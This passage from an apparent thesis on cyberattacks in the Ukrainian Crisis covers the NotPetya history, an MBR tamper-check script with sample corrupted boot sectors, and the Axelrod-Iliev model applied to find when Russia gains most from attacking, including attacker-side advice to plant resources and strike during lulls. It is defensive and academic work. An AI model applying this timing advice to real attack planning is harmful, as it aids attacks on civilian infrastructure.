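# the machine still boots, but into the attacker's code rather than the OS loader.
REPLACED_LOADER_MBR = bytes([0xFA, 0x31, 0xC0]) + b"\x00" * 443 + TABLE + b"\x55\xaa"

if __name__ == "__main__":
    base = mbr_baseline(GOOD_MBR)
    for name, img in [("good", GOOD_MBR), ("zeroed", ZEROED_MBR),
                      ("replaced loader", REPLACED_LOADER_MBR)]:
        print(f"{name:16s}", check_mbr(img, base) or ["ok"])
```

Run from trusted boot media, the check would read the real sector with `open("/dev/sda", "rb").read(512)` on Linux and compare it with a baseline captured at provisioning; the same approach extends to any other sector the malware is known to touch, such as sector 33 mentioned above.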

This attack originated in Kyiv, Ukraine, at a small software business called Linkos Group. The Group is responsible for routine updates to M.E.Doc, an accounting program used by most businesses and private citizens to complete their taxes. However, on June 27, 2017, it was the servers at Linkos Group that launched the NotPetya malware across Ukraine, and subsequently the world. By hacking the update servers of Linkos Group, alleged Russian state hackers were able to send NotPetya to PCs around the world that had M.E.Doc installed. The malware quickly spread and took down machines.218 Once it was recognized on a computer it was too late: files were already destroyed, and the malware was already spreading to other devices on the server.

Throughout Ukraine it was estimated that 10 percent of all computers were wiped of data. The malware wiped data from a large portion of Ukrainian infrastructure, including 4 hospitals in Kyiv, 6 power companies, 2 airports, 22 banks including their ATM networks and card payment systems, retail and transport card information and almost every Ukrainian federal agency.219 The second largest bank in Ukraine, Oschadbank, had 90 percent of all bank computers compromised.220

This malware spread from Ukraine to other countries, institutions and industries. It was recorded in 64 countries including the United States, Brazil, Denmark, and even Russia.221 The far-reaching and uncontrollable malware was found in hospitals in Pennsylvania, in the French construction company Saint-Gobain, on the computers at a chocolate factory in Tasmania, and infected some of the largest companies in the world, such as the shipping giant Maersk, the Russian oil giant RosNeft, the medical supplier Merck and FedEx subsidiary TNT Express.222 It was estimated that companies and government agencies spent over $10B USD on damages from the NotPetya attack, with some companies having to deal with a halt in production or services for months afterwards. The shipping giant Maersk had to “reinstall 4,000 servers, 45,000 PCs, and 2,500 applications…over ten days.”223 It cost Maersk alone over $200M USD, with an additional $264M USD in quarterly revenue loss; it caused a backlog at marine terminals, with no way for the workers on the ground to contact the headquarters, and a large amount of product sat in container warehouses or was lost, waiting for Maersk to come back online.224

217 Sood and Hurley, “NotPetya Technical Analysis.”
218 Andy Greenberg, “The Untold Story of NotPetya, the Most Devastating Cyberattack in History,” Wired, 22 August 2018. https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/
219 Ibid.
220 Ibid.
221 Olena Goncharova, Oksana Grytsenko and Denys Krasnikov, “Ukraine finds itself at the epicenter of global cyber attack,” Kyiv Post, 30 Jun 2017. https://www.pressreader.com/ukraine/kyiv-post/20170630/281741269437161

The attack has been attributed to Russian state hackers, but the fact that RosNeft was a victim of NotPetya gives plausible deniability to the Kremlin.225 However, the method in which the malware was disseminated is a tactic that has been used by Russian government hackers previously, most notably in the BE3/KillDisk and CrashOverride/Industroyer attacks against critical infrastructure in 2015 and 2016, respectively. The code was created without an express military or governmental target and was uncontrollable, snaking its way through systems to infect a large amount of infrastructure and industry outside of Ukraine. This attack cannot be considered cyber warfare because it was not a kinetic attack and did not lead to death or destruction that would parallel a physical act of war. This attack’s primary goal of deleting information means it cannot be considered strictly cyber espionage. This attack would fall under the category of cyber terrorism because it had no clear goal of disrupting government or military structures and was used as an indiscriminate weapon.

222 Andy Greenberg, “The Untold Story of NotPetya, the Most Devastating Cyberattack in History,” Wired, 22 August 2018. https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/
223 Charlie Osborne, “NotPetya ransomware forced Maersk to reinstall 4000 servers, 45000 PCs,” 26 January 2018. Zero Day Net. Zdnet.com. https://www.zdnet.com/article/maersk-forced-to-reinstall-4000-servers-45000-pcs-due-to-notpetya-attack/
224 Lee Mathews, “Ransomware Attack Cost Shipping Giant Maersk Over 200 Million,” Forbes, 16 August 2017. https://www.forbes.com/sites/leemathews/2017/08/16/notpetya-ransomware-attack-cost-shipping-giant-maersk-over-200-million/#71b0f5574f9a
225 Ellen Nakashima, “Russian military was behind ‘NotPetya’ cyberattack in Ukraine, CIA concludes,” The Washington Post. 12 January 2018.

Summary.

The Ukrainian Crisis has included the Maidan Revolution, the annexation of Crimea and the ongoing war in Donbas. Prior to the Maidan Revolution cyberattacks were generally unsophisticated and were thought to be perpetrated primarily by non-state actors. As the violence during the Maidan revolution increased, so did targeted cyberattacks against the opposition, largely through cyber espionage and information warfare. The annexation of Crimea was assisted by cyberattacks that cut off mainland Ukraine from the Crimean Peninsula, forcing Crimean citizens to rely on the unmarked soldiers that took over the streets and government buildings. After the annexation of Crimea, Luhansk and Donetsk declared themselves independent and similar unmarked troops appeared in the regions to support the separatists.

International pressure against Russia had little to no effect on the ensuing war that unfolded, and physical attacks throughout the eastern regions of Ukraine continued and were coupled with cyberattacks against critical infrastructure. As the Crisis continues, attacks become more sophisticated in nature, affect a larger population of Ukraine and have the potential to spill over into international repercussions. Through all of the stages of the Crisis, the use of cyber capabilities in conjunction with conventional warfare tactics makes the Ukrainian Crisis a unique conflict to study while attempting to understand hybrid warfare and the interconnected roles of cyber and physical warfare. In addition, the Ukrainian Crisis is a case study that is beneficial to understanding what dynamic arises between large and small states in an era where a new method of waging war, cyber, is employed.

5 DETERMINING OPTIMAL TIMING

Prediction in the social sciences has always had an aspect of uncertainty surrounding it due to the uncertainty of human nature. Political science and international relations scholarly research is often heavily focused on theory and qualitative analysis rather than quantitative analysis.

However, the prediction of trends in warfare is a tool that can be used in conjunction with theory and qualitative analysis in international relations. There are many formulas used for prediction, from regression analysis and other types of trend analysis, as will be discussed in Chapter 6, to mathematical formalisms, as discussed in this chapter.

Wu et al. create a cyberattack prediction model based on a Bayesian network model. In their work they use the vulnerabilities in the network, the value of assets in the network and the usage condition of the network to determine attack probabilities.226 Experimental results show that coupling major environmental factors with a Bayesian network model produces more accurate results. While Bayesian models are not the approach used here, the concept of using major physical factors as a driving force in cyber prediction is a concept upon which this thesis is based.

Jaganathan et al. focus on the vulnerabilities of a network, where the model is applied for defensive, rather than offensive, strategies, but assumes access to reliable data on structure, vulnerabilities and traffic within the network.227 This model uses the Common Vulnerability Scoring System (CVSS) and studies how CVSS impacts, or is impacted by, network vulnerabilities and traffic. Previous work in the area of prediction models demonstrates the importance of analyzing how different aspects of a conflict affect seemingly unrelated aspects of the same conflict.228

226 Wu Jinyu, Lihua Yin and Yunchuan Guo. “Cyber Attacks Prediction Model Based on Bayesian Network.” IEEE Security and Privacy Workshops (2012). 227 Venkatesh Jaganathan, Priyesh Cherurveettil and Premapriya Muthu Sivashanmugam. “Using a Prediction Model to Manage Cyber Security Threats.” The Scientific World Journal 2015. Tamilnadu: Hindawi Publishing Corporation (2015).

This chapter operationalizes the equation presented by Robert Axelrod and Rumen Iliev in their 2014 paper “Timing of Cyber Conflict,” created to decide “when to use a [cyber] resource to exploit a vulnerability.”229 The model was created to determine when “the trade-off between waiting until the stakes of the present situation are high enough to warrant the use of the cyber resource, but not waiting so long that the vulnerability is discovered and patched.”230

5.1 The Axelrod-Iliev Model

The Axelrod-Iliev model was chosen instead of others because it places more lenient constraints on the information needed to compute the optimal timing of an attack. Working outside of the Ukrainian system, access to specific and detailed knowledge of the vulnerabilities of the system designs is limited, so operationalizing other prediction models, such as a Bayesian model, is unlikely to provide verifiable results. For many models, data collection is hampered by government secrecy and lack of access, while the Axelrod-Iliev model is not bogged down by data collection difficulties. Further, the Axelrod-Iliev model considers social aspects that other models neglect, or deem less important, and is primarily focused on the situational risk surrounding an attack. Although this equation was created from the attacker’s viewpoint and was only operationalized through retrospective analysis, it will, while determining the offensive capabilities of Russia, be used to determine the most probable timing of a cyberattack against Ukraine. The final reason for the use of this model is its assertion that “when stakes are constant the optimum policy is to use a cyber resource as soon and as long as possible.”231 State perception of stakes almost wholly defines this equation, so this is an approach that is beneficial in ongoing conflicts, such as the Ukrainian Crisis.

228 Geographical, minorities, time, resources. 229 Axelrod and Iliev, “Timing of Cyber Conflict,” 1298. 230 Ibid.

Before presenting the equation itself, we provide a description of the parameters and variables used by Axelrod-Iliev. The equation defines a value (V) that represents the overall future value of using a cyberattack. It is based on the persistence (P), which is “the probability that if you refrain from using a resource now it will still be usable in the next time period.”232 This can be stated as a conditional probability, the probability that the resource survives without being used, denoted as Pr(resource survives | not used). The stealth (S) is the conditional probability that a resource survives if it is used and is denoted as Pr(resource survives | used). Axelrod and Iliev argue that the timing of the use of a cyber weapon should be based on what is at stake (s) and on the threshold of stakes (T), which is the point at which you should use the resource.233 This occurs when the gain from using the resource exceeds some average threshold gain G(T). Finally, the potential payoff from the use of a resource diminishes with time, so a discount rate (w) is applied in the formulation.

Thus, to operationalize the equation for use in the Ukrainian Crisis the following formulation is adopted, which is the Axelrod-Iliev equation:

V = \Pr(s \ge T)\,\bigl(G(T) + wSV\bigr) + \bigl(1 - \Pr(s \ge T)\bigr)\,wPV

which can be solved for V and simplified as follows:

V = \frac{\Pr(s \ge T)\,G(T)}{(1 - wP) + \Pr(s \ge T)\,w\,(P - S)}

231 Axelrod and Iliev, “Timing of Cyber Conflict,” 1300. 232 Ibid. 1299. 233 Ibid. 1300.

This equation has been applied to data from the Ukrainian Crisis, so all values have been compiled from information collected on the cyberattacks in the ongoing war. The five cyberattacks introduced in Chapter 4: Operation Armagedon, FANCY BEAR X-Agent, BlackEnergy 3/KillDisk, CrashOverride/Industroyer and NotPetya, are used to determine the Persistence of the attacks in Ukraine.

5.2 Applying the Axelrod-Iliev

Persistence is further defined by P = 2S, based on the assumption that if a resource remains unused, its ability to remain undetected for a further period of time is doubled. Since the calculations concerning the Ukrainian Crisis are drawn from a data set where stealth and persistence are based on only five Ukrainian cyberattacks, the confidence in the sample is low. Unfortunately, the confidence interval is wide, meaning there is low certainty in the numbers calculated.

The model requires Persistence to be stated as a probability. To change the number of days each malware was in the system into a probability, the mean and standard deviation of the duration, in days, of the population of cyberattacks were needed to create a curve which could then be used to place the attacks against Ukraine. To determine the standard deviation and mean, the data presented in the 2012 paper “Before We Knew It: An Empirical Study of Zero-day Attacks in the Real World” by Leyla Bilge and Tudor Dumitras is adopted.234 Calculating the mean and standard deviation is accomplished by calculating the duration of each attack, beginning with the Attack Start Date and concluding with the Disclosure Date, omitting the Disclosure Date from the total number of days, to get the length of each attack in days. The durations of the 18 zero-day attacks, presented in Table 1, are used to calculate the mean and the standard deviation of the duration of attacks.235 Those two factors are then used to determine the probability of the attacks against Ukraine, as required by the Axelrod-Iliev equation.

234 Bilge, Leyla and Tudor Dumitras. “Before we Knew it: An Empirical Study of Zero-Day Attacks in the Real World.” CCS. North Carolina: Symantec Research Labs, October 2012.

For this thesis the mean and standard deviation are calculated using the 18 data points given in Chart 1. It is noteworthy that Bilge and Dumitras identify the mean as 312 days, which differs from the calculations undertaken in this work. The 312 days is referenced by Axelrod and Iliev as the average number of days malware can exist in a system before it is discovered. However, based on the 18 data points available here, the calculated mean is 380.89 days (rounded to 381 days) without removing the outliers, or 372 days when they are removed. Although this differs from the figure reported earlier, it is possible that they either removed outliers or used a geometric mean in their calculations. Outlier removal would have a highly variable impact on the calculations because the decision of what constitutes an outlier is often subjective. If a geometric mean was used, it will result in a lower “mean” value by virtue of the nature of the calculation itself (i.e. it is the nth root of the product of the n data points) rather than the arithmetic mean, which is based on a linear calculation of the sum of the n data points.

Although this means the earlier work is not directly comparable with these results, it does not affect the core findings reported in the following.

235 Bilge and Dumitras, “Before we Knew it.” 7.

Table 1: The Zero-day vulnerabilities236

Name             Attack Start Date    Disclosure Date     Number of days
CVE 2008-0015    28 December 2008     6 July 2009         190
CVE 2008-2249    14 October 2008      9 December 2009     421
CVE 2008-4250    5 February 2008      23 October 2008     261
CVE 2009-0084    23 October 2008      14 April 2009       173
CVE 2009-0561    11 January 2009      9 June 2009         149
CVE 2009-0658    2 September 2008     20 February 2009    171
CVE 2009-1134    25 June 2008         9 July 2009         329
CVE 2009-2501    7 January 2009       13 October 2009     279
CVE 2009-3126    27 January 2009      13 October 2009     259
CVE 2009-4324    15 March 2009        14 December 2009    274
CVE 2010-0028    14 October 2008      10 February 2010    484
CVE 2010-0480    26 March 2010        14 April 2010       19
CVE 2010-1241    29 November 2008     11 April 2010       498
CVE 2010-2568    13 February 2008     17 July 2010        885
CVE 2010-2862    5 March 2009         4 August 2010       517
CVE 2010-2883    14 December 2008     8 September 2010    633
CVE 2011-0618    3 January 2010       13 May 2011         495
CVE 2011-1331    19 March 2009        16 June 2011        819

Calculating Persistence (P)

To determine the optimal timing of a cyberattack using the Axelrod-Iliev formula, both stealth and persistence are derived by averaging the Ukrainian cyberattacks, as discussed above. Calculating optimal timing based on Stealth (S) requires S = P/2, and the mean duration of the five Ukrainian attacks in Table 2, rows 1-5, was calculated to be µ = 398 days.

236 Bilge and Dumitras, “Before we Knew it.”

Operationalization of µ = 398 is completed by placing the mean of the Ukrainian attacks on a curve with the entire population. Table 1 shows the 18 zero-day attacks from which the mean and standard deviation were derived after removing the high and low outliers (m = 372 and σ = 190). From the population mean and standard deviation it is possible to calculate the z-score to determine where µ = 398 lies on the curve by percentile.

To determine the z-score, we use the formula:

z = \frac{x - \mu_{pop}}{\sigma_{pop}}

Therefore:

z = \frac{398 - 372}{190}

z = 0.137

Using a Z-score chart,237 the proportion (α) of values lower than µ = 398 is α = 0.5557, which means that µ = 398 is in the 55.57th percentile of the population of cyberattacks. Persistence is operationalized as the value 0.5557.

This means that a cyberattack perpetrated against Ukraine has a 55 percent chance of survival if not used. What should be determined from this is the optimal timing to use an exploit that fits the mean parameters of all cyberattacks in Ukraine. From this, the risk level at which it is generally most beneficial to use an exploit against Ukraine can be determined.

237 “Z Table,” University of Florida, last accessed March 16, 2019. http://www.stat.ufl.edu/~athienit/Tables/Ztable.pdf

Table 2: Attacks on Ukraine

Name                         Attack Start Date    Disclosure Date      Number of Days
X-Agent                      28 April 2013¹       21 December 2014¹    602
Operation Armagedon          26 June 2013         3 April 2015         646
Black Energy 3/KillDisk      23 June 2015¹        23 December 2015     183
CrashOverride/Industroyer    July 2015¹           17 December 2016     ~519
NotPetya                     18 May 2017¹         27 June 2017         40

Calculating Stealth (S)

Stealth can be defined as “the probability that if you use a resource now it will still be usable in the next time period.”238 This is also defined by Axelrod and Iliev as Pr(resource survives | used). Stealth is further defined by S = P/2, based on the assumption that once a resource is used, its ability to remain undetected for a further period of time is cut in half. Following the assumed formula S = P/2, the following is true:

S = 0.5557 / 2

S = 0.27785 ≈ 0.2779

Calculating Threshold (T)

The Threshold can be defined simply as “the threshold that will cause you to use the resource.”239 The lower the threshold, the more often the resource can be used, but there will be a lower average gain from each use. A threshold of T = 1 means that the resource should always be used, whereas a threshold of T = 6 means that a resource should not be used until it is truly needed. T is also an indicator of the stakes surrounding the use of a cyber resource. When stakes are T = 1, they are low, meaning a resource is likely to survive longer, no matter how many times it is used. If stakes are T = 6, the stakes of using the cyber resource are high, meaning the use of a resource is likely to cause alarm, therefore sacrificing any future usability. To determine the stakes of the cyber resource, this paper will use the simplest case where “the distribution of stakes is linear, meaning that in each year there is the same probability that the stakes will be 1,2,3,4,5, or 6.”240 Due to historical Russian use of information warfare and cyberattacks, it is assumed that the Russian government will use a cyberattack while any stakes are present.

238 Axelrod and Iliev, “Timing of Cyber Conflict.” 239 Ibid. 1299.

Calculating Discount Rate (w)

The discount rate is “a reflection of the fact that a given payout is less a year from now than it is today”.241 In Axelrod and Iliev’s paper they use w = 0.9, as this value is the standard discount rate. This is the same value that will be used in the calculations regarding the timing of attack in the Ukrainian Crisis. Due to the changing nature of conflict, it is understood that w = 0.9 is not necessarily the most consistently accurate discount rate value.

Applying the Equation to Ukraine Data

Pr(s ≥ T) is the probability that the current stakes are greater than or equal to the Threshold at any time. This value is the probability that the resource will be used at a given time. With stakes s uniformly distributed over 1 to 6, Pr(s ≥ T) is evaluated for each Threshold (T) as follows:

              T = 1         T = 2         T = 3         T = 4         T = 5         T = 6
s = 1         Pr(1 ≥ 1)     Pr(1 ≥ 2)     Pr(1 ≥ 3)     Pr(1 ≥ 4)     Pr(1 ≥ 5)     Pr(1 ≥ 6)
s = 2         Pr(2 ≥ 1)     Pr(2 ≥ 2)     Pr(2 ≥ 3)     Pr(2 ≥ 4)     Pr(2 ≥ 5)     Pr(2 ≥ 6)
s = 3         Pr(3 ≥ 1)     Pr(3 ≥ 2)     Pr(3 ≥ 3)     Pr(3 ≥ 4)     Pr(3 ≥ 5)     Pr(3 ≥ 6)
s = 4         Pr(4 ≥ 1)     Pr(4 ≥ 2)     Pr(4 ≥ 3)     Pr(4 ≥ 4)     Pr(4 ≥ 5)     Pr(4 ≥ 6)
s = 5         Pr(5 ≥ 1)     Pr(5 ≥ 2)     Pr(5 ≥ 3)     Pr(5 ≥ 4)     Pr(5 ≥ 5)     Pr(5 ≥ 6)
s = 6         Pr(6 ≥ 1)     Pr(6 ≥ 2)     Pr(6 ≥ 3)     Pr(6 ≥ 4)     Pr(6 ≥ 5)     Pr(6 ≥ 6)

Pr(s ≥ T)     6/6 = 1       5/6 = 0.833   4/6 = 0.667   3/6 = 0.5     2/6 = 0.333   1/6 = 0.167

240 Axelrod and Iliev. “Timing of Cyber Conflict.” 1300. 241 Ibid. 1299

1 − Pr(s ≥ T) is the complement of the probability that the current stakes are greater than or equal to the Threshold at any time, i.e. the probability that the resource is held back. It is calculated as one minus the probability above.

G(T) is the average short-term gain, which can be defined in terms of the threshold as the average of the stakes at which the decision to attack is made.242 The Threshold selected for the Ukrainian Crisis is based on the relationship between Russia and Ukraine, where, due to political aspirations and socio-economic rivalries, as well as historic information warfare from the Russian government, a resource can be used while the stakes are at any level. Thus, calculations will be done to show the expected value of an attack at multiple threshold levels. The average short-term gain, G(T), is calculated as follows, based on the Threshold:

G(1) = \frac{1 + 2 + 3 + 4 + 5 + 6}{6} = 3.5

G(2) = \frac{2 + 3 + 4 + 5 + 6}{5} = 4

G(3) = \frac{3 + 4 + 5 + 6}{4} = 4.5

G(4) = \frac{4 + 5 + 6}{3} = 5

G(5) = \frac{5 + 6}{2} = 5.5

G(6) = \frac{6}{1} = 6

242 Axelrod and Iliev. “Timing of Cyber Conflict.” 1299.

5.3 Solving for Optimal Timing

All calculated values follow:

Pr(s ≥ T) and G(T) depend on which Threshold (T) value is being calculated.

w = 0.9

Persistence (P) = 0.5557

Stealth (S = P/2) = 0.27785

The following equation solves for P = 0.5557 (55.57% chance of resource survival) and T = 1 (the resource should be used right away and as often as possible), where the stakes probability is Pr(1 ≥ 1) = 1:

V = \frac{(1)(3.5)}{\bigl(1 - (0.9)(0.5557)\bigr) + (1)(0.9)(0.5557 - 0.27785)}


Table 3: Optimal timing of a Cyber Attack Based on Ukrainian Attacks

Threshold (T)    V
1                4.6671
2                4.7051
3                4.5028
4                4.0006
5                3.1434
6                1.85
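The whole Chapter 5 pipeline as a worked script, added here as an illustration and not code from the thesis or from Axelrod and Iliev: it takes the Table 1 and Table 2 durations, derives P through the z-score and Z-table step, sets S = P/2, builds Pr(s ≥ T) and G(T) for the linear stakes case, and evaluates the simplified equation for T = 1 to 6. Two assumptions are made explicit: the Z-table lookup is reproduced by rounding z to two decimals and evaluating the normal CDF with math.erf, and σ is the sample standard deviation (which is what gives 190).

```python
"""Added worked example (not code from the thesis): the Axelrod-Iliev timing
calculation of Chapter 5, using only the Python standard library."""
import math
import statistics
from fractions import Fraction

# Table 1 durations in days (18 zero-day attacks, Bilge and Dumitras).
ZERO_DAY_DURATIONS = [190, 421, 261, 173, 149, 171, 329, 279, 259, 274,
                      484, 19, 498, 885, 517, 633, 495, 819]
# Table 2 durations in days for the five attacks on Ukraine.
UKRAINE_DURATIONS = {"X-Agent": 602, "Operation Armagedon": 646,
                     "BlackEnergy 3/KillDisk": 183,
                     "CrashOverride/Industroyer": 519, "NotPetya": 40}
DISCOUNT_RATE = 0.9  # w, the value Axelrod and Iliev use


def population_parameters(durations, drop_outliers=True):
    """Mean and sample standard deviation of the zero-day durations.
    The thesis drops the single highest and lowest values (885 and 19)."""
    data = sorted(durations)
    if drop_outliers:
        data = data[1:-1]
    return statistics.mean(data), statistics.stdev(data)


def z_score(x, mean, std):
    """z = (x - mu_pop) / sigma_pop."""
    return (x - mean) / std


def z_table_lookup(z):
    """Proportion of the population below z as read from a two-decimal Z table:
    round z to two decimals first, then evaluate the standard normal CDF
    (assumption: this is how the printed table was read)."""
    z2 = round(z, 2)
    return round(0.5 * (1.0 + math.erf(z2 / math.sqrt(2.0))), 4)


def persistence(ukraine_durations, zero_day_durations):
    """P = Pr(resource survives | not used): the percentile of the mean
    Ukrainian duration on the curve fitted to the zero-day population."""
    mu = statistics.mean(ukraine_durations.values())
    mean, std = population_parameters(zero_day_durations)
    return z_table_lookup(z_score(mu, mean, std))


def stealth(p):
    """S = P/2, the thesis's assumption for Pr(resource survives | used)."""
    return p / 2


def stakes_probability(t, levels=6):
    """Pr(s >= T) when stakes are uniform on 1..levels (the linear case)."""
    return Fraction(levels - t + 1, levels)


def short_term_gain(t, levels=6):
    """G(T): mean of the stakes at or above the threshold."""
    return Fraction(sum(range(t, levels + 1)), levels - t + 1)


def value(t, p, s, w=DISCOUNT_RATE):
    """Simplified Axelrod-Iliev value
    V = Pr(s>=T) G(T) / [(1 - wP) + Pr(s>=T) w (P - S)]."""
    pr = float(stakes_probability(t))
    g = float(short_term_gain(t))
    return pr * g / ((1 - w * p) + pr * w * (p - s))


def optimal_threshold(p, s, w=DISCOUNT_RATE, levels=6):
    """Table 3 for every T, plus the T with the largest V."""
    table = {t: value(t, p, s, w) for t in range(1, levels + 1)}
    return table, max(table, key=table.get)


if __name__ == "__main__":
    P = persistence(UKRAINE_DURATIONS, ZERO_DAY_DURATIONS)
    S = stealth(P)
    table, best = optimal_threshold(P, S)
    print(f"P = {P}, S = {S}")
    for t, v in table.items():
        print(f"T = {t}: V = {v:.4f}")
    print(f"optimal threshold T = {best}")
```

Because the thesis carried the rounded probabilities 0.833, 0.667 and 0.167 into Table 3 while this script keeps exact fractions, the values agree to roughly three decimals and the optimum T = 2 is unchanged.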

Based on Table 3, the optimal threshold is T = 2, meaning that a cyberattack is most beneficial for Russia to undertake when the stakes are relatively low, such as during a lull in fighting or a major international problem that diverts focus from the Ukrainian Crisis. If the Russian government exploits a vulnerability in the Ukrainian system while stakes are low, it is more likely to last longer in the system, and can be used multiple times, if programmed to do so, to attack the system. If a vulnerability is exploited during a time of high stakes there is a greater likelihood that it will be found more quickly and will not be able to perform the attack.

Since Ukraine has a shortage of cyber security expertise, cyber resources can remain in the system for a long time before they are discovered. Thus, resources should be placed and then lie in wait for the optimal deployment time. This means that the Russians should place new cyber resources in the system that can be exploited during times of lowered hostilities. Attackers should refrain from using the cyber resource when the Ukrainian government is on guard because of a recent uptick in hostilities or a recently discovered attempt at cyber espionage. Waiting to exploit a vulnerability is most beneficial when governmental focus has been directed away from cyber capabilities in favor of something else. As Russia has a distinct advantage over Ukraine in terms of military infrastructure and capability, the chance that an exploit exists for a longer period of time than the international average is high. Attacks that are made to routinely exploit vulnerabilities should be used covertly and often when there are stakes to consider, but not such high stakes that defense is at the forefront of the government’s agenda. Attacking with lower stakes means the information gained or vulnerability exploited will lack continuity and value, while using a resource during higher stakes means that the resource is unlikely to survive long enough to carry out an attack that has serious ramifications.

5.4 Conclusion

This chapter operationalizes the mathematical equation for predicting cyberattacks presented by Axelrod and Iliev in their 2014 paper “Timing of Cyber Conflict.” Cyber conflict is a concern many states are taking seriously, especially as large powers move to dominate the cyber sphere and use it to their advantage. Russia has emerged as one of the primary players in using cyber as an offensive weapon, and its use of cyberattacks against Ukraine was the basis for the operationalization of the equation. This paper intended to calculate the conditions that would be optimal for the next Russian cyberattack on Ukraine, and then use that information to make an informed defensive strategy for Ukraine. However, the discrepancy in cyber capabilities between Russia and Ukraine means it is most important for Ukraine to continue to bolster its cyber defensive and offensive capabilities. This should be done while simultaneously being aware that there are large vulnerabilities in its current system that are being exploited by Russia.

The Axelrod-Iliev equation calculates an optimal value of T = 2, meaning the attacks against Ukraine that will be most efficient are those which take place during a lull in the risk of using the cyber resource.

This means that there will be a diversion of focus away from the Ukrainian Crisis or the Ukrainian government will feel less vulnerable for any number of reasons. These reasons could range from an increase in Ukrainian confidence from installing new defensive software or transitioning away from Soviet-built infrastructure, to a downturn in fighting or possibly a fruitful ceasefire negotiation.

Ukraine’s cyber defense system should be bolstered against attack through the use of continually upgrading cyber capabilities and training more developers to monitor systems and ensure more widespread security. Penetration teams should conduct extensive testing to try to penetrate the most vital Ukrainian systems. Most importantly, a feeling of confidence in cyber security should never be normalized. When the risks of using a cyber resource are lowered the chance a cyber resource can wreak more havoc and remain longer in the system becomes greater.

Assumptions that a downturn in fighting or a ceasefire are likely to cause a downturn in the use of cyberattacks are incorrect, as the equation, operationalized using Ukrainian Crisis data, predicts that a cyberattack is likely during a calmer period of physical attacks. Thus, cyber teams should remain aware of the physical attributes of the conflict and be prepared to patch vulnerabilities, defend the systems and clean up after an attack when the physical attacks go quiet.

Further research in this area should include expanding the sample size of cyberattacks in Ukraine and should consider the changing nature of Ukraine’s cyber security field. This equation would be better suited to determining the optimal timing for a specific resource within the Ukrainian Crisis, rather than trying to predict the next cyberattack, which has unknown parameters. One avenue for future research would be to couple it with an extensive game-theory design that would more accurately account for the changing nature of the Ukrainian Crisis and the political backdrop on which these cyberattacks are taking place.


6 STATISTICAL ANALYSIS

While quantitative analysis is often not used in strategic studies research and cyberwarfare in favor of the theory surrounding international relations and war, new technologies in warfare must be viewed through a more precise lens. Theories surrounding the use of hybrid warfare are plentiful, but they all aim to describe rather than explain or reach a conclusive decision on what steps should be taken to alleviate international pressures of the cyber sphere. The lack of definitions within this area of study, as discussed in Chapter 2, and the desire to control cyber capabilities, as discussed in Chapter 3, further hamper understanding that would facilitate cyber cooperation within the international community. Since it is difficult to agree on how to approach cyber, especially in terms of war or cooperation, it is important to back theories with data.

Building on the idea that cyberattacks are most likely to take place in the Ukrainian Crisis when the risk is lowered, this chapter focuses on how to look at physical attributes of the war to understand the imminence of a cyberattack. This data can then be used to prove or disprove the findings in the previous chapter as well as highlight other correlations that may not have been presented in the previous data. Based on the theoretical finding that a threshold where 푇 = 2 is optimal, it follows that there will most likely be a downturn in fighting leading towards the date of a cyberattack, with a high likelihood that fighting will again climb following the cyberattack. If a ceasefire was in negotiation, as it was during NotPetya, the fighting will continue to diminish following the cyberattack. From the stakes calculated for the Ukrainian Crisis, the statistical data is analyzed to discern if the calculation makes logical sense, analyze when the attacks take place around cyberattacks, and provide a better understanding of when cyberattacks are likely to be employed against Ukraine.


As this analysis aims to assess the conflict using empirical data, following a strict methodology of data collection and data analysis is vital. To ensure the most accurate data collection the following methodology is used.

The site liveuamap.com was used for data collection for all data points.243 While the data collected by the Organization for Security and Cooperation in Europe (OSCE) may be more accurate than that collected by liveuamap.com, the latter was chosen for several reasons. First, the OSCE data does not distinguish between Ukrainian attacks and Russian/LNR/DNR attacks. Since this project specifically looks at the relationship between the attacks carried out by the Russian/LNR/DNR groups and their attacks on Ukrainian infrastructure, the OSCE data was less useful. The second reason the liveuamap.com data was chosen is that we wanted to include many different types of data, especially volunteer data that is missing from other data sets. The third reason is that liveuamap.com compiles data from many sources, including social media, which often has better insight into what is happening on the ground because many volunteers or soldiers post information that is then captured by liveuamap.com. The final reason this website is deemed the best point of data collection is that the US Embassy in Kyiv used it as a tool for monitoring the situation in Donbas. Thus, we are confident that using liveuamap.com as the main point of data collection is appropriate.

Five categories of data were collected for three cyberattacks: BE3/KillDisk (Appendix A, Table 1), CrashOverride/Industroyer (Appendix A, Table 2) and NotPetya (Appendix A, Table 3). These three cyberattacks were chosen, while Operation Armagedon and X-Agent were disregarded, due to the nature of the three attacks. Each of BE3/KillDisk, CrashOverride/Industroyer and NotPetya had a discernible attack date, whereas Operation Armagedon and X-Agent were made to remain in the systems for a long period of time.

243 Ukraine Interactive Map. Live Universal Awareness Map. Last modified April 30, 2019. https://liveuamap.com

The five categories of data used were: Bombings, Open Firing, Military Personnel and Policemen Killed or Wounded, Civilians and Politicians Killed or Wounded, and Protests. These categories are chosen due to the differences between each category, and to capture the most data points possible. Each category had specific parameters for the data points collected that will be expounded upon in their respective sections. If data did not fall within these categories, the data was not included. All five categories are collected day by day for each attack. Data was collected 90 days prior to and 90 days after each cyberattack. This was chosen to ensure ample time to discern if there was a trend spanning a long period of time, before or after, the attack.

We begin the analysis of the attack data by collecting the day by day events. Data was then split into several different tables to analyze the data points concisely. First, each category within each attack was plotted. This allows us to identify trends across the categories of the same attack. Second, the data from individual days were plotted based on each category, with the three different cyberattacks overlaid. This allows us to identify trends across the three cyberattacks within the same category. Then a 5th degree polynomial trendline was added to view trends across all three attacks within each of the five physical attribute categories. Third, the day by day charts were duplicated and overlaid with a two-day moving average. This showed outliers as well as smoothing out the data to show more discernible trends. Fourth, each day by day event was compiled by week to show a more compact chart and view weekly trends. This removed fluctuations based on one-off events. These charts were plotted similarly to the day by day charts: each chart was a specific category, with the three cyberattacks overlaid. Fifth, failed cyberattacks were plotted on the weekly trend charts to determine if there were any discernible trends in physical attributes during the time of thwarted cyberattacks.

The first model used to assess trends within the data is plotting a polynomial trendline, using a 5th degree polynomial. Polynomial functions are used to model changes over time in real world applications (e.g. the stock market) and are therefore chosen as the trendline of best fit.244

The 5th degree polynomial allows more data points to be used when creating the trend line, allowing for a higher confidence in the results.245 While the R values fluctuate in confidence level, the trend lines themselves help to view patterns within the data, even where the trendline is not statistically significant.

